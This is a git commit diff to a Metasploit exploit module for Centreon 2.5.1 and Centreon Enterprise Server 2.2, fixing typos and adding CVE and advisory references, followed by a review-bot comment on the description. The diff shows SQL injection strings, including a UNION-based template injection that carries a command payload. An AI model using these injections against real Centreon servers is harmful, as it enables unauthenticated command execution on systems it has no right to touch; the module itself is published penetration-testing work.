Add references and fix typos

bug/bundler_fix
jvazquez-r7 2014-10-17 15:29:28 -05:00
parent 299d9afa6f
commit d831a20629
1 changed files with 10 additions and 7 deletions


@ -16,21 +16,23 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
displayServiceStatus.php component, allow to remote unauthenticated execution of
arbitrary commands. The module only requires a session available in the application
at the moment of exploitation. This module has been tested successfully on Centreon
Enterprise Server 2.2.
displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
commands. The module only requires a session available in the application at the moment
of exploitation. It means a legit ust must be logged in. This module has been tested
successfully on Centreon Enterprise Server 2.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tom MaZ', # Vulnerability Discovery
'MaZ', # Vulnerability Discovery and Analysis
'juan vazquez' # Metasploit Module
],
'References' =>
[
['CVE', '2014-3828'],
['CVE', '2014-3829']
['CVE', '2014-3829'],
['US-CERT-VU', '298796'],
['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
],
'Arch' => ARCH_CMD,
'Platform' => 'unix',
@ -84,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
elsif check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited or you just need to wait until someone logged in")
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited, maybe you just need to wait until someone logs in")
end
print_status("#{peer} - Exploiting...")
@ -93,6 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
res = send_template_id(session_injection, template_injection)
if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
vprint_status("Output: #{res.body}")
end
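Review bot: The rewritten 'Description' text in the first hunk introduces a new typo, so the sentence `of exploitation. It means a legit ust must be logged in. This module has been tested` should read `of exploitation. This means a legitimate user must be logged in. This module has been tested`. That sentence is the only place the module states its precondition, and anyone assessing exposure from this text needs it to be unambiguous. The same paragraph still says "unauthenticated" while requiring an active session in the application, so it is worth stating plainly that no credentials are needed but a logged-in user's session must exist. The module info hash and the methods in the later hunks start and end outside the visible lines, so this applies only to the text shown.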